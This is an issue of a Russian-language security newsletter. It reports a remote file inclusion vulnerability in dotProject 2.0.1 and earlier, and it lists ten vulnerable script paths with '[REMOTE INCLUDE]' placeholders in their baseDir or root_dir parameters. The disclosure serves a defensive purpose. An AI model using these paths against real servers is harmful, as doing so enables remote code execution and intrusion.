Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в dotProject.


Компьютер для продвинутых пользователей
Содержание:
dotProject
ПО: dotProject
Версии: <=2.0.1

О программе:
dotProject добровольно поддерживает приложения Project Management.
Детали:
'protection.php' скрипт не проверяет правильный ввод пользователя параметров 'siteurl'. Этот ввод не проверяет корректность и атакующий может вставить адрес удаленного php файла и использовать внутренней php-код или встроенную системную команду через eval().
Для использования этой уязвимости register_globals должен иметь параметр ON.
Использование:
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]

3) /includes/session.php?baseDir=[REMOTE INCLUDE]

4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

dotProject
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можной найти: 273214003

В избранное